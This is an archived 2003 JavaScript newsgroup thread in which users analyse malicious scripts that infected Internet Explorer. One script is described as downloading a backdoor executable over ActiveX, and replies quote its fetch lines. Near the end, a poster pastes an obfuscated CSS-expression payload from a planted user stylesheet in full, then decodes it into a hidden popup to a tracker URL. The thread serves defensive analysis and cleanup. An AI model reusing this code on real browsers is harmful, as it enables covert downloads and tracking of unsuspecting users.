Decode Javascript Virus code

Jibba Jabba

unread,

Oct 3, 2003, 6:03:35 AM10/3/03

to

Can someone help me figure out what virus this is? It appeared on a web
page and instantly my Zonealarm and Norton AV shut down. I know I was
infected with something but can't figure out what it is yet. Thanks.

Steve van Dongen

unread,

Oct 3, 2003, 6:28:46 AM10/3/03

to

On Fri, 03 Oct 2003 10:03:35 GMT, "Jibba Jabba"
<dontm...@pcconnect.net> wrote:

>Can someone help me figure out what virus this is? It appeared on a web
>page and instantly my Zonealarm and Norton AV shut down. I know I was
>infected with something but can't figure out what it is yet. Thanks.

<"encoded" script cut />

I won't post the actual script here but basically it gets
http://www.lhconline.net/js/mmc.exe and saves it as C:\Program
Files\Windows Media Player\wmplayer.exe. Then navigates to mms://.
Whatever that is... Probably something to do with media player.

So, I'd uninstall Media Player, make sure that file is deleted,
reinstall Media Player, scan your machine with Norton AV, and go to
http://windowsupdate.microsoft.com and install any critical and
security patches.

Of course, unless Norton AV finds something, there's no way to know
what the virus actually did.

Regards,
Steve

lallous

unread,

Oct 3, 2003, 9:49:01 AM10/3/03

to

Simply replace the line:
document.write('\u003c..................") with something like:
alert('................')

Or add a form and text a textarea tag and do this: myform.mytextarea.value =
'..................';

--
Elias
http://lgwm.org/
"Jibba Jabba" <dontm...@pcconnect.net> wrote in message
news:XPbfb.13372$NX3....@newsread3.news.pas.earthlink.net...

Hendrik Krauss

unread,

Oct 3, 2003, 10:21:47 AM10/3/03

to

Jibba Jabba wrote:
> Can someone help me figure out what virus this is? It appeared on a web
> page and instantly my Zonealarm and Norton AV shut down. I know I was
> infected with something but can't figure out what it is yet. Thanks.

[code snippet skipped]

I don't know the Internet Explorer and ActiveX very well, but my "educated guess" is: the script you posted
uses an ActiveX mechanism to download http://www.lhconline.net/js/mmc.exe, renames it to C:\Program
Files\Windows Media Player\wmplayer.exe, and then requests IE to launch Windows Media Player (which it just
replaced with the malicious mmc.exe code). My virus scanner identifies the downloaded mmc.exe as the
"BDS/Beast202.1" backdoor, which would explain why odd things start to happen on your machine. I'm sure you
can find information about this backdoor at Symantec or other security websites.
I'm not a security expert, but once a backdoor is on your system, all sorts of nasty things can be deployed to
it. You should kill the backdoor process and all processes it spawned*, update and run Norton AV, and ask
someone who knows about this stuff, especially backdoors, afap. Until this is over, set Zonealarm to block
everything, unless you really need to get something from the net. Unless you are using ActiveX frequently,
consider switching it off to prevent incidents like this.

Best Regards
Hendrik Krauss

* Get some tool, e.g. the Sysinternals process explorer (freeware), to see which process spawned what.
www.sysinternals.com

Hendrik Krauss

unread,

Oct 3, 2003, 10:31:21 AM10/3/03

to

Jibba Jabba wrote:

> Can someone help me figure out what virus this is? It appeared on a web
> page and instantly my Zonealarm and Norton AV shut down. I know I was
> infected with something but can't figure out what it is yet. Thanks.

[code snippet skipped]

I don't know the Internet Explorer and ActiveX very well, but my "educated guess" is: the script you posted
uses an ActiveX mechanism to download http://www.lhconline.net/js/mmc.exe, renames it to C:\Program
Files\Windows Media Player\wmplayer.exe, and then requests IE to launch Windows Media Player (which it just
replaced with the malicious mmc.exe code). My virus scanner identifies the downloaded mmc.exe as the
"BDS/Beast202.1" backdoor, which would explain why odd things start to happen on your machine. I'm sure you
can find information about this backdoor at Symantec or other security websites.
I'm not a security expert, but once a backdoor is on your system, all sorts of nasty things can be deployed to
it. You should kill the backdoor process and all processes it spawned*, update and run Norton AV, and ask
someone who knows about this stuff, especially backdoors, afap. Until this is over, set Zonealarm to block
everything, unless you really need to get something from the net. Unless you are using ActiveX frequently,
consider switching it off to prevent incidents like this.

Best Regards
Hendrik Krauss

* Get some tool, e.g. the Sysinternals process explorer (freeware), to see which process spawned what.

http://www.sysinternals.com

Hywel Jenkins

unread,

Oct 3, 2003, 12:49:20 PM10/3/03

to

In article <XPbfb.13372$NX3....@newsread3.news.pas.earthlink.net>,
dontm...@pcconnect.net says...

> Can someone help me figure out what virus this is? It appeared on a web
> page and instantly my Zonealarm and Norton AV shut down. I know I was
> infected with something but can't figure out what it is yet. Thanks.

It was certainly a good idea to post the entire code here, wasn't it?

--
Hywel I do not eat quiche
http://hyweljenkins.co.uk/
http://hyweljenkins.co.uk/mfaq.php

Grant Wagner

unread,

Oct 3, 2003, 5:44:53 PM10/3/03

to

Hywel Jenkins wrote:

> In article <XPbfb.13372$NX3....@newsread3.news.pas.earthlink.net>,
> dontm...@pcconnect.net says...
> > Can someone help me figure out what virus this is? It appeared on a web
> > page and instantly my Zonealarm and Norton AV shut down. I know I was
> > infected with something but can't figure out what it is yet. Thanks.
>
> It was certainly a good idea to post the entire code here, wasn't it?

Well, if people actually used their heads for something other then keeping the
neck of their shirt open, this wouldn't be a problem.

I just checked, when run in the Default security configuration of IE from an
untrusted site, it prompts with the following dialog:

This page is accessing information that is not under its
control. This poses a security risk. Do you want to
continue?
Yes No

Gee, I wonder what the right answer is.

Not to mention that:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.lhconline.net/js/mmc.exe",0);

won't even work unless you downloaded the page containing the "virus" from
lhconline.net in the first place.

So, this replicated as a "virus" in much the same way as if I had broken into
the virology lab, made my way into the most secure lab, stolen ebola virus,
then proceeded to spread it over my city in a crop-dusting airplane.

--
| Grant Wagner <gwa...@agricoreunited.com>

* Client-side Javascript and Netscape 4 DOM Reference available at:
*
http://devedge.netscape.com/library/manuals/2000/javascript/1.3/reference/frames.html

* Internet Explorer DOM Reference available at:
*
http://msdn.microsoft.com/workshop/author/dhtml/reference/dhtml_reference_entry.asp

* Netscape 6/7 DOM Reference available at:
* http://www.mozilla.org/docs/dom/domref/
* Tips for upgrading JavaScript for Netscape 7 / Mozilla
* http://www.mozilla.org/docs/web-developer/upgrade_2.html

Jibba Jabba

unread,

Oct 3, 2003, 5:48:59 PM10/3/03

to

And if people weren't hiding behind the internet under some cloak of
anonymity, you'd think they'd actually have more courtesy than to insult
another person without justfication. But of course, when in real life,
they'd probably be the biggest cowards.

Yeah sure I wasn't too careful this time because IE has a hole which allowed
the code to be downloaded when I visited the page. It then proceeded to
shut down my AV. Not everyone wants to disable activeX and use Firebird you
know.

"Grant Wagner" <gwa...@agricoreunited.com> wrote in message
news:3F7DEC39...@agricoreunited.com...

Jibba Jabba

unread,

Oct 3, 2003, 5:50:55 PM10/3/03

to

And no I was never prompted with the popup warning message. My IE6 uses the
default security setting as well. I will have to take a closer look at why
I never received that prompt, but your insults are nothing short of
childish.

"Grant Wagner" <gwa...@agricoreunited.com> wrote in message
news:3F7DEC39...@agricoreunited.com...

Hywel Jenkins

unread,

Oct 3, 2003, 6:49:08 PM10/3/03

to

In article <f9mfb.355$gA1...@newsread3.news.pas.earthlink.net>,
dontm...@pcconnect.net says...

> And if people weren't hiding behind the internet under some cloak of
> anonymity, you'd think they'd actually have more courtesy than to insult
> another person without justfication.

Who unsulted you "under some cloak of anonymity"?

> But of course, when in real life,
> they'd probably be the biggest cowards.

You wanna take the risk?

> Not everyone wants to disable activeX and use Firebird you
> know.

Have you noticed that whenever the news covers these "security issues"
they never mention that only MS software is affected?

Jibba Jabba

unread,

Oct 3, 2003, 10:19:53 PM10/3/03

to

> Who unsulted you "under some cloak of anonymity"?

Guys like you!

> You wanna take the risk?

Do YOU want to take the risk?

> Have you noticed that whenever the news covers these "security issues"
> they never mention that only MS software is affected?

What's your point? The hack exploited a weakness in one of IE's unpatched
activeX controls. I was never given a warning whatsoever. You know, not
everyone is willing to forgo every functionality just to be "safe"... This
is hardly the same as opening up attachments from people you don't know.
This was clearly a case of M$ not fixing their software. In fact, doing a
windows update, it showed there were NO new security updates for my system.

Yeah so I got infected. But I realized the hack within seconds of it
happening and came on here for help immediately. Don't even try to
categorize me with the clueless who go around for months without even
knowing a thing. This was clearly a case of M$ not fixing their software,
not my ignorance.

So get off your high horse. Having a dirty mouth doesn't mean you're
superior. All it shows is that people like you have no manners.

Ivo

unread,

Oct 3, 2003, 11:52:21 PM10/3/03

to

"Jibba Jabba" <ja...@dontmailme.coma> wrote in message
news:d7qfb.627$Qy2...@newsread4.news.pas.earthlink.net...

> > You wanna take the risk?
>
> Do YOU want to take the risk?
>

Why do some interesting threads turn personal so quickly?
Ivo

Btw. I found I had a user stylesheet defined in my IE Internet Options,
which I never put there. Regardless of how it got there and for how long it
has run its devious style, I would like to post the code it contains as it
is -again- a clever script and would be of interest in this group, but would
that be wise? How often is that discussed?

Lasse Reichstein Nielsen

unread,

Oct 4, 2003, 5:18:26 AM10/4/03

to

"Ivo" <n...@thank.you> writes:

> Btw. I found I had a user stylesheet defined in my IE Internet Options,
> which I never put there.

What? IE has user style sheets? And nobody told me? ... Yes! There it
is, under Accessibility. Oh, the pages are SO going to be surpriced!

> Regardless of how it got there and for how long it has run its
> devious style, I would like to post the code it contains as it is
> -again- a clever script and would be of interest in this group, but
> would that be wise? How often is that discussed?

I can't see any reason not to post it, or put it on a page (as
inactive text, not script, ofcourse) and discuss it. I am very much
a proponent of full disclosure :)

It is Javascript, and you want to discuss it. To me, that means that
you are in the correct group.

Off-line reading people will want you to post the code in your
message, onliners like me prefer a link, but it's not like it can't
be combined.

And for IE:
--- <URL:http://www.pivx.com/larholm/unpatched/> ---
11 September 2003: There are currently 31 unpatched vulnerabilities.
---

/L
--
Lasse Reichstein Nielsen - l...@hotpop.com
Art D'HTML: <URL:http://www.infimum.dk/HTML/randomArtSplit.html>
'Faith without judgement merely degrades the spirit divine.'

Lasse Reichstein Nielsen

unread,

Oct 4, 2003, 5:19:46 AM10/4/03

to

Hywel Jenkins <hywelj...@hotmail.com> writes:

> It was certainly a good idea to post the entire code here, wasn't it?

I can't see a problem with it. It is a large amount of code, and I
would personally prefer a link, but there are people reading newsgroups
off-line, who would not follow a link.

Steve van Dongen

unread,

Oct 4, 2003, 5:31:36 AM10/4/03

to

On Sat, 04 Oct 2003 02:19:53 GMT, "Jibba Jabba" <ja...@dontmailme.coma>
wrote:

...

>In fact, doing a
>windows update, it showed there were NO new security updates for my system.

Did you check today? MS03-040 was released late yesterday.
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-040.asp

Regards,
Steve

Dr John Stockton

unread,

Oct 4, 2003, 5:37:06 PM10/4/03

to

JRS: In article <ekxtz7...@hotpop.com>, seen in
news:comp.lang.javascript, Lasse Reichstein Nielsen <l...@hotpop.com>
posted at Sat, 4 Oct 2003 11:19:46 :-

>Hywel Jenkins <hywelj...@hotmail.com> writes:
>
>> It was certainly a good idea to post the entire code here, wasn't it?
>
>I can't see a problem with it. It is a large amount of code, and I
>would personally prefer a link, but there are people reading newsgroups
>off-line, who would not follow a link.

More importantly, by publishing it in News the OP has made it readily
available to many, of whom some may wish to use it as, or to produce
further, malware.

If the OP has been infected by it, it is probably already available to
those skilled in malware; but that is no excuse for making it more
readily available to others. If even a single PFY infects someone else
with it as a result of the posting, then Jibba Jabba is in part
responsible - an accessory before the fact.

If the OP had posted a well-chosen part of it, not in itself harmful but
enough to have been recognised, then someone familiar with it could have
advised him.

--
© John Stockton, Surrey, UK. ???@merlyn.demon.co.uk Turnpike v4.00 MIME. ©
Web <URL:http://www.merlyn.demon.co.uk/> - FAQish topics, acronyms, & links.
Check boilerplate spelling -- error is a public sign of incompetence.
Never fully trust an article from a poster who gives no full real name.

Atrax

unread,

Oct 5, 2003, 2:31:54 AM10/5/03

to

> Not everyone wants to disable activeX and use Firebird you
know.

or install patches to keep IE up-to-date, obviously.

________________________________________
Atrax. MVP, IIS
http://rtfm.atrax.co.uk/

newsflash : Atrax.Richedit 1.0 now released.
http://rtfm.atrax.co.uk/infinitemonkeys/components/Atrax.RichEdit/

*** Sent via Developersdex http://www.developersdex.com ***
Don't just participate in USENET...get rewarded for it!

Ivo

unread,

Oct 11, 2003, 12:50:35 PM10/11/03

to

"Lasse Reichstein Nielsen" <l...@hotpop.com> types:

> "Ivo" <n...@thank.you> writes:
>
> > Btw. I found I had a user stylesheet defined in my IE Internet Options,
> > which I never put there.
>
> What? IE has user style sheets? And nobody told me? ... Yes! There it
> is, under Accessibility. Oh, the pages are SO going to be surpriced!

> (...)

> I can't see any reason not to post it, or put it on a page (as
> inactive text, not script, ofcourse) and discuss it. I am very much
> a proponent of full disclosure :)
>

Not only can you apply styles to all downloaded documents, also these styles
can actually be scripts! Here is what I found in userstylesheet.bmp:

img{behavior:url(#default#clientCaps);background-color:expression(eval(Strin
g.fromCharCode(40,116,104,105,115,46,97,108,116,61,61,39,83,85,82,70,32,73,7
8,32,83,84,89,76,69,46,46,46,32,84,72,69,32,83,69,88,32,84,82,65,67,75,69,82
,33,39,41,63,40,40,119,105,110,100,111,119,46,111,112,101,110,40,39,104,116,
116,112,58,47,47,37,54,102,37,55,53,37,55,52,37,50,101,37,55,52,37,55,50,37,
55,53,37,54,53,37,50,100,37,54,51,37,54,102,37,55,53,37,54,101,37,55,52,37,5
4,53,37,55,50,37,50,101,37,54,51,37,54,102,37,54,100,47,37,54,52,47,63,37,51
,54,37,51,53,37,51,54,37,51,51,37,51,56,37,51,55,39,44,39,104,118,111,39,44,
39,120,61,53,48,48,48,44,116,111,112,61,53,48,48,48,44,121,61,53,48,48,48,44
,108,101,102,116,61,53,48,48,48,44,104,101,105,103,104,116,61,54,48,48,44,11
9,105,100,116,104,61,56,48,48,44,100,105,114,101,99,116,111,114,105,101,115,
61,110,111,44,116,111,111,108,98,97,114,61,110,111,44,115,116,97,116,117,115
,61,110,111,44,108,111,99,97,116,105,111,110,61,110,111,44,114,101,115,105,1
22,97,98,108,101,61,110,111,44,109,101,110,117,98,97,114,61,110,111,44,115,9
9,114,111,108,108,98,97,114,115,61,110,111,39,41,41,63,32,116,104,105,115,46
,97,108,116,61,39,83,85,82,70,32,73,78,32,83,84,89,76,69,46,46,46,32,84,72,6
9,32,83,69,88,32,84,82,65,67,75,69,82,33,32,39,58,39,39,41,58,39,39)))}

This encoded string translates as

(this.alt=='SURF IN STYLE... THE SEX
TRACKER!')?((window.open('http://%6f%75%74%2e%74%72%75%65%2d%63%6f%75%6e%74%
65%72%2e%63%6f%6d/%64/?%36%35%36%33%38%37','hvo','x=5000,top=5000,y=5000,lef
t=5000,height=600,width=800,directories=no,toolbar=no,status=no,location=no,
resizable=no,menubar=no,scrollbars=no'))? this.alt='SURF IN STYLE... THE SEX
TRACKER! ':''):''

and the encoded url translated as:

out.true-counter.com/d/?656387